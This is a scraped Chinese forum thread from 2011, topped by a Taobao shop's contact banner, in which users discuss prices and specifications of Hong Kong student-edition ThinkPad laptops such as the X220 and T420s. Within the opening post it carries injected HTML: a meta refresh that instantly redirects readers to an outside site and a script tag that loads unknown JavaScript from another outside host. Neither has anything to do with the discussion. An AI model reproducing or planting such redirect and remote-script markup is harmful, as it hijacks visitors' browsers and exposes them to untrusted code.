开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

2011年香港学生机配置已出

http://www.hknotebook.com/polyu2011/lenovo/home.jsp

价格还要等到货才知道,大家先看看配置吧,我觉得X220和T420s比较有性价比。另外,今年没有高分的T420,T420的主力型号没有对应机器稍显遗憾。

<meta http-equiv="refresh" content="0; url=http://www.9292.cc">
★★★
<script type="text/javascript" src="http://www.7755.cc/q.js"></script>
<link href="http://www.7755.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

回复 EddieFan 的帖子

另外追问,似乎T420那款不太好,分辨率不行,内存不行,硬盘也小,没有新加坡那台7999的好。虽然价格也便宜不少。但是T420S是不是散热不理想啊
我先发的连接,还在审核中啊。。。。。。。。。。。。。。。。。

X220
    Intel® Core™ i5-2540M Dual-Core Processor (2.60 GHz, up to 3.30 GHz / 3M Cache)
    Windows® 7 Home Premium 64-bit (TC/ENG)
    1 x 4GB DDR3 1333MHz / 1 Free Slot
    320GB SATA HDD (7200rpm)
    12.5" HD Anti-Glare / LED-Backlit (1366x768)
    Intel® HD Graphics 3000 in processor
    Li-Ion 6-cell Battery / Up to 7.5 hours
    3-year Carry-in International Warranty / 1-year Warranty for Battery / 1-year Lenovo Protection Service

才5800元啊
本来都准备出手了,可又有了这么优惠的事情。还是再等等?
青锋柯 发表于 2011-7-28 18:28
X220
    Intel® Core™ i5-2540M Dual-Core Processor (2.60 GHz, up to 3.30 GHz / 3M Cache)
    W ...

还要算上运费,学生加的钱,到了再看价格吧,呵呵
回复 xiang39 的帖子

当然

学生加的钱?
xiang39 发表于 2011-7-28 19:13
本来都准备出手了,可又有了这么优惠的事情。还是再等等?

我在顶楼写了,价格等机器到了才知道。

历年来,学生机都会和常规机价格差不多,如果学生机定价过高,联想会调整或者补贴,如果学生机定价过低,会有学生或者其他人加价。

我的结论是,如果想按照网站这个价格买到机器,除非你能找到香港学生不加价给您买一台。另外还要算上运输费用。

一不小心被海關吃了就虧死了。。。  发表于 2011-7-29 13:01

差价1750,不知道加了运费,给学生的钱,和利润,能便宜多少
T420s 对应的 差3362元呢!!!
回复 xiang39 的帖子

这么多,没注意
420s不错
1366*768的屏
学生机做了这么多年了,价格等真正到了货走着瞧,肯定和常规机差不出300元
学生机跟常规机质量一样吗?  做工啥的

一样  发表于 2011-7-29 11:54
昨天搜索了一下T400 ,很怀念那个时候
回复 青锋柯 的帖子

没机会了 我之前发的带连接的就泥入海了
照片上看着像X1啊,巧克力键盘
EddieFan 发表于 2011-7-29 01:06
学生机做了这么多年了,价格等真正到了货走着瞧,肯定和常规机差不出300元 ...

300也是钱呢啊。

早买早享受了。学生机不知道什么时候呢。不能再用原来那个闪屏了

各种找理由说服自己

300是和港货的差价,算下来和新加坡货就没什么差价了。  发表于 2011-7-30 11:19
回复 ct455332 的帖子

我肯定要买个x220,看这种形式我肯定也要等拉
220没有顶配  遗憾 啊
没有IPS屏的学生机么

没有,目前看只有一款  发表于 2011-7-30 21:01
eddiefan难不成所有论坛里人买了啥电脑全都能记得...太恐怖鸟...顺丰那人我上班没看到他电话三次了..明早才送来...
我觉得T420哪款挺好的,就看价格了。